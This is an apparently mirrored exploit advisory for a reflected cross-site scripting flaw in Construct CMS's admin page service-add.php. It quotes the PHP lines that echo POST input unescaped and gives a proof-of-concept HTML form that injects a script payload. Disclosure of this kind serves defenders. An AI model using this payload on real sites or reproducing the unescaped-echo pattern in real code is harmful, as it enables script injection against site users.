Construct CMS - Cross-Site Scripting - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1215302 漏洞类型
发布时间 2018-07-08 更新时间 2018-07-08
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018070079
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Title : Construct CMS - Cross-Site Scripting
Author : Abolfazl Hajizade
Category : Webapps 
tested on: Windows-linux 
Google Dork: N/A


Vulnerable page: 
/construct/upload/cms/admin/service-add.php

Vulnerable Source: 

line 133: "<?php if(isset($_POST['name'])){echo $_POST['name'];} ?>"

line 139: "<?php if(isset($_POST['slug'])){echo $_POST['slug'];} ?>"

POC: 

<html>
<body>
<form action="http://localhost/construct/upload/cms/admin/service-add.php" method="post">

<input type="text" name="name" value="<script>alert('ultrasec')</script>"/>

<input type="submit" value="exploit"/>

</form>
</body>
</html>

================================ 

WebSite : UltraSec.Org 
Channel : @UltraSecurity 
Email : zeroday1010@gmail.com 

Special Thanks : ashkan moghaddas , MrQadir , Milad Ranjbar